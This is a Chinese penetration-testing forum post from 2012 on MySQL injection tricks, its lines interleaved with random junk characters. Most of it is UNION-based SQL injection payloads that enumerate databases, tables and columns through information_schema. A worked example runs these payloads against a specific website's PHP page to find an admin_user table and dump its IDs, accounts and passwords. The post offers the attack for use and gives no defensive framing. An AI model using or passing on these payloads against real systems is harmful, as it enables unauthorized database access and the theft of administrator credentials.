中国网络渗透测试联盟

标题: mysql注入技巧 [打印本页]

作者: admin    时间: 2012-9-13 16:29
标题: mysql注入技巧
查库5 D1 ^( A. o" b( n5 |  J
  z% Y/ ]/ q3 W! y+ ]: W' S: q
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
9 D% E! i  |9 q. A) H6 |1 z
; ?7 t9 B, |% O, h) C查表
6 t% O- V4 J0 M, M& E- Y5 m" s+ X5 k4 q- j# i
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1( n  a  m4 r8 a9 b  J' ?/ J; W

. ], |% w6 z9 v4 }. s1 r7 U查段: k4 Q7 v! }7 z% `% m

6 ^/ F! a6 _7 {  l4 Lid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
" G" W9 v2 B. E4 \& |! Q
/ e# V, b  v, I! w# B- C  ?( I. L  x5 t- c. z
mysql5高级注入方法暴表
0 ^6 _% L  m, y2 m2 C. ~9 I, ~/ x4 d" F& r
例子如下:
- g" f( F# S; r( T8 X
( i& U. C/ ^8 h1.爆表
! Q3 `5 r+ X7 f9 khttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
% f8 q* ~- s9 W* N1 o' U这样爆到第4个时出现了admin_user表。; f1 ~6 c8 ^) G  e, @
  k  D. k# G" S  |
2.暴字段
* m( y, z* x7 L. d' Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
. Q% T6 G7 |9 b2 Y( a& S5 k2 B) [0 W  U* l+ h# {) ?

+ K: L7 v2 N8 d* `0 u3.爆密码
& J6 Z# N% v6 L$ b) c; p& N/ Lhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
4 d  q0 Y/ z: C0 i3 p$ y8 \' G$ F6 x8 U3 G6 G- p

. r( Z8 I0 B7 T) S




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2